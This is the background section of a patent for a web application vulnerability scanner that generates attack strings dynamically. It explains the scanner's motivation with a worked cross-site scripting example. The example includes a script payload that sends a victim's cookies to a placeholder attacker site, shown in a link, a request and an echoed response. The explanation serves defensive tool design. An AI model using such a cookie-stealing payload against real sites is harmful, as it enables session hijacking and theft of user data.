The present invention relates to the field of web site analysis and, more specifically, to a web site analysis tool that improves the speed and performance of assessing a site by dynamically generating attack strings based on some of the characteristics of operation of the web site.
The free exchange of information facilitated by personal computers surfing over the Internet has spawned a variety of risks for the organizations that host that information and likewise, for those who own the information. This threat is most prevalent in interactive applications hosted on the World Wide Web and accessible by almost any personal computer located anywhere in the world. Web applications can take many forms: an informational Web site, an intranet, an extranet, an e-commerce Web site, an exchange, a search engine, a transaction engine, or an e-business. These applications are typically linked to computer systems that contain weaknesses that can pose risks to a company. Weaknesses can exist in system architecture, system configuration, application design, implementation configuration, and operations. The risks include the possibility of incorrect calculations, damaged hardware and software, data accessed by unauthorized users, data theft or loss, misuse of the system, and disrupted business operations.
As the digital enterprise embraces the benefits of e-business, the use of Web-based technology will continue to grow. Corporations today use the Web as a way to manage their customer relationships, enhance their supply chain operations, expand into new markets, and deploy new products and services to customers and employees. However, successfully implementing the powerful benefits of Web-based technologies can be greatly impeded without a consistent approach to Web application security.
It may surprise industry outsiders to learn that hackers routinely attack almost every commercial Web site, from large consumer e-commerce sites and portals to government agencies such as NASA and the CIA. In the past, the majority of security breaches occurred at the network layer of corporate systems. Today, however, hackers are manipulating Web applications inside the corporate firewall, enabling them to access and sabotage corporate and customer data. Given even a tiny hole in a company's Web-application code, an experienced intruder armed with only a Web browser (and a little determination) can break into most commercial Web sites.
The problem is much greater than industry watchdogs realize. Many U.S. businesses do not even monitor online activities at the Web application level. This lack of security permits even attempted attacks to go unnoticed. It puts the company in a reactive security posture, in which nothing gets fixed until after the situation occurs. Reactive security could mean sacrificing sensitive data as a catalyst for policy change.
A new level of security breach has begun to occur through continuously open Internet ports (port 80 for general Web traffic and port 443 for encrypted traffic). Because these ports are open to all incoming Internet traffic from the outside, they are gateways through which hackers can access secure files and proprietary corporate and customer data. While rogue hackers make the news, there exists a much more likely threat in the form of online theft, terrorism, and espionage.
Today the hackers are one step ahead of the enterprise. While corporations rush to develop their security policies and implement even a basic security foundation, the professional hacker continues to find new ways to attack. Most hackers are using “out-of-the-box” security holes to gain escalated privileges or execute commands on a company's server. Simply incorrectly configuring off-the-shelf Web applications leave gaping security vulnerabilities in an unsuspecting company's Web site.
Passwords, SSL and data-encryption, firewalls, and standard scanning programs may not be enough. Passwords can be cracked. Most encryption protects only data transmission; however, the majority of Web application data is stored in a readable form. Firewalls have openings. Scanning programs generally check networks for known vulnerabilities on standard servers and applications, not proprietary applications and custom Web pages and scripts.
Programmers typically don't develop Web applications with security in mind. What's more, most companies continue to outsource the majority of their Web site or Web application development using third-party development resources. Whether these development groups are individuals or consultancies, the fact is that most programmers are focused on the “feature and function” side of the development plan and assume that security is embedded into the coding practices. However, these third-party development resources typically do not have even core security expertise. They also have certain objectives, such as rapid development schedules, that do not lend themselves to the security scrutiny required to implement a “safe solution.”
Manipulating a Web application is simple. It is often relatively easy for a hacker to find and change hidden form fields that indicate a product price. Using a similar technique, a hacker can also change the parameters of a Common Gateway Interface (CGI) script to search for a password file instead of a product price. If some components of a Web application are not integrated and configured correctly, such as search functionality, the site could be subject to buffer-overflow attacks that could grant a hacker access to administrative pages. Today's Web-application coding practices largely ignore some of the most basic security measures required to keep a company and its data safe from unauthorized access.
Developers and security professionals must be able to detect holes in both standard and proprietary applications. They can then evaluate the severity of the security holes and propose prioritized solutions, enabling an organization to protect existing applications and implement new software quickly. A typical process involves evaluating all applications on Web-connected devices, examining each line of application logic for existing and potential security vulnerabilities.
A Web application attack typically involves five phases: port scans for default pages, information gathering about server type and application logic, systematic testing of application functions, planning the attack, and launching the attack. The results of the attack could be lost data, content manipulation, or even theft and loss of customers.
A hacker can employ numerous techniques to exploit a Web application. Some examples include parameter manipulation, forced parameters, cookie tampering, common file queries, use of known exploits, directory enumeration, Web server testing, link traversal, path truncation, session hijacking, hidden Web paths, Java applet reverse engineering, backup checking, extension checking, parameter passing, cross-site scripting, and SQL injection.
Assessment tools provide a detailed analysis of Web application and site vulnerabilities. FIG. 1 is a system diagram of a typical structure for an assessment tool. Through the Web Assessment Interface 100, the user designates which application, site or Web service resident on a web server or destination system 110 available over network 120 to analyze. The user selects the type of assessment, which policy to use, enters the URL, and then starts the process.
The assessment tool uses software agents 130 to conduct the vulnerability assessment. The software agents 130 are composed of sophisticated sets of heuristics that enable the tool to apply intelligent application-level vulnerability checks and to accurately identify security issues while minimizing false positives. The tool begins the crawl phase of the application using software agents to dynamically catalog all areas. As these agents complete their assessment, findings are reported back to the main security engine through assessment database 140 so that the results can be analyzed. The tool then enters an audit phase by launching other software agents that evaluate the gathered information and apply attack algorithms to determine the presence and severity of vulnerabilities. The tool then correlates the results and presents them in an easy to understand format to the reporting interface 150.
One of the popular attacks on web applications is called cross site scripting or XSS. XSS is a technique that is used against a web application to gather personal or malicious information about a user of the web application and is one of the most common application level attacks that hackers use to break into a web application. XSS is a three party attack that involves the attacker, as well as the web application and a user.
The basic door through which an XSS attack enters is a vulnerable script that exists on the vulnerable site. The vulnerable script operates to receive an HTTP request and then echoes it back to the page sending the request. The echo of the HTTP request may be a full echo or a partial echo, but in either case, the vulnerability exists because the script does not first sanitize the content of the HTTP request prior to echoing it back. As such, if the HTTP request contains malicious objects, such as JavaScript code or HTML tags, these objects can be acted upon by the receiving browser and cause damage or breach the user's privacy.
Those skilled in the art will be familiar with the various techniques and vulnerabilities that can be exploited using XSS but, for purposes of clarity a specific example of an XSS attack is presented. Many websites include a welcome page that is presented after logging into the website or upon accessing the website. The welcome script (i.e, welcome.cgi) generally accepts a parameter [name] and when executed, provides a welcome message to the user. A request sent to the web application generally is structured as:
GET /welcome.cgi?name=WORLD HTTP/1.0host: www.targetwebsite.com
Upon receiving the request, the web application at www.targetwebsite.com responds with the following response:
<HTML><Title>Welcome to the TargetWebSite</Title>HELLO WORLD<BR>...</HTML>
To exploit this capability using an XSS attack, a hacker will place a specially structured link at a convenient location for a user to activate. Such placement may include within an email message, or at a web site that is accessed from an email message or potentially browsed by the user. In essence, the link replaces the parameter value for name, with a JavaScript that once echoed to the user's browser will be executed. Generally, the JavaScript is used to access cookies that the client browser has previously created and that are associated with the target web site. Because the security model from JavaScript allows scripts arriving from a particular site to access cookies belonging to that site, and because the browser simply experiences the JavaScript coming from the target web site, the cookies are laid vulnerable to this attack. The specially structured link may look like this:
 http://www.target.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
When the user activates the malicious link, the browser generates the following request:
  GET/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script> HTTP/1.0  Host: www.target.site
In response to this request, the target web site provides the following response:
  <HTML>  <Title>Welcome to the TargetWebSite</Title>  Hello<script>window.open(“http://www.attacker.site/collect.-cgi?cookie=”+document.cookie)</script>  <BR>  ...  </HTML>
The user's browser receives this response and interprets the response as an HTML page containing a piece of JavaScript code. The browser then willingly executes the JavaScript code which then allows access to all cookies belonging to or associated with the target web site and then sends them to an attacker's web site by invoking a script on the attacker's web site—collect.cgi that accepts the cookies as a parameter.
Thus, a hacker can inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable web application to victimize a user and obtain information from the user. This information can result in account hijacking, changing of user settings, cookie theft/poisoning, or false advertising. Hackers are creating new methods to conduct XSS attacks on a daily basis.
For the most part, using a vulnerability database with static checks has been a successful approach. Today's web application and web services assessment products boast thousands of static checks for security vulnerabilities like XSS and SQL Injection. The web application assessment software vendors have essentially been striving to create and market the best vulnerability database with the most checks. However, as web applications and their functionalities have grown in scale and complexity, there has been a consequent rise in problems with standard web application scanning methodology. At the rate the industry is currently going with the growing number of checks, vulnerability databases will have tens of thousands of static checks in a few years. With that many checks, the time required to run application scans will be quite extensive, as the scan time for an application scales linearly with each additional check in the vulnerability database. Thus there is a need in the art and related industry for a new technology that will greatly decrease the amount of time required for identifying such vulnerabilities without compromising the effectiveness of the vulnerability assessment tools. FIG. 2 is a conceptual diagram of how a traditional web application scanning vulnerability assessment would be conducted when seeking an instance of cross-site scripting. The same attacks are repeatedly submitted against all avenues of inputs that were discovered during a “crawl” of the application to see if a dialog box can be opened, indicating that the application is indeed susceptible to cross-site scripting. Even if the web application filters a potentially malicious character such as “>”, multiple attacks that include that character will still be submitted. Thus, there are several problems with current state-of-the-art vulnerability assessment tools thereby creating a need in the art for an improved methodology.
One of the needs or problems that exist in the art is that the traditional approach of using static checks lacks the application of “intelligence” in solving the problem. The standard “bulk” approach in assessment tools is very limiting in that it applies an “all or nothing” methodology that doesn't utilize any intelligence or logic other than yes or no and the sheer number of vulnerability signatures being submitted. Another problem that exists in the state of the art is that assessments take too long. As previously mentioned, the number of potential vulnerabilities and their variants is constantly growing. To handle this situation, longer lists of static checks, each of which must be submitted against an application, means slower scanning times. It takes a large database of static checks just to ensure the accuracy of a scan. Yet another problem in the current art is that a high number of false positives are generated using current technologies. As web vulnerabilities and technologies change with time, it is difficult for checks to stay accurate. Vulnerability signatures are “hard coded” and static, and heavily technology dependent. In essence, they cannot be dynamic or intelligent about what the server is responding with. This can lead to a high number of “false positives” when an automated assessment tool flags a vulnerability that in actuality, does not exist. Each false positive has to be manually verified—a time intensive task.
Thus, there is a need in the art for a method and system for conducting vulnerability assessments that do not only rely on a static approach to performing the assessment, but that can actually apply intelligence in performing the assessment. Such a solution should allow for a reduction in the number of checks that must be performed in conducting an assessment, improve the performance or reduce the time required to perform an assessment, and help to reduce the occurrence of false positives. Thus, there is a need in the art for web site and web applications assessment tool that can tackle the ever increasing complexities of analyzing web sites and web applications in a manner that is accurate, but that is quicker and more efficient than today's technology. The present invention as described herein provides such a solution.